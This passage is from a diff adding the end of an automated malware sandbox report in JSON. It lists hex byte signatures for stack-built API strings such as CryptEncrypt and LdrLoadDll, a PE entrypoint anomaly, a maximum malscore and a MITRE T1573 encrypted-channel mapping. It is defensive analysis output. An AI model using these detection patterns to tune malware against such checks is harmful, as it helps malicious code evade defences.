}', '{ C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 E8 43 C6 45 E9 72 C6 45 EA 79 C6 45 EB 70 C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }', '{ C6 45 E9 72 C6 45 EA 79 C6 45 EB 70 C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }', '{ C6 45 EA 79 C6 45 EB 70 C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }', '{ C6 45 EB 70 C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }', '{ C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }', '{ C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }', '{ C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }', '{ C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }', '{ C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }', '{ C6 45 C8 52 C6 45 C9 74 C6 45 CA 6C C6 45 CB 49 C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 C9 74 C6 45 CA 6C C6 45 CB 49 C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 CA 6C C6 45 CB 49 C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 CB 49 C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }', '{ C6 45 E0 4C C6 45 E1 64 C6 45 E2 72 C6 45 E3 4C C6 45 E4 6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }', '{ C6 45 E1 64 C6 45 E2 72 C6 45 E3 4C C6 45 E4 6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }', '{ C6 45 E2 72 C6 45 E3 4C C6 45 E4 6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }', '{ C6 45 E3 4C C6 45 E4 6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }', '{ C6 45 E4 6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }', '{ C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }', '{ C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }']'" + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "static_pe_anomaly", + "description": "Anomalous binary characteristics", + "categories": [ + "static" + ], + "severity": 3, + "weight": 1, + "confidence": 80, + "references": [], + "data": [ + { + "anomaly": "Entrypoint of binary is located outside of any mapped sections" + } + ], + "new_data": [], + "alert": false, + "families": [] + } + ], + "malscore": 10.0, + "ttps": [ + { + "signature": "network_cnc_https_generic", + "ttps": [ + "T1573" + ], + "mbcs": [] + } + ], + "malstatus": "Malicious", + "mitre_attck": { + "Command and Control": [ + { + "t_id": "T1573", + "ttp_name": "Encrypted Channel", + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.", + "signature": [ + "network_cnc_https_generic" + ] + } + ] + } +} \ No newline at end of file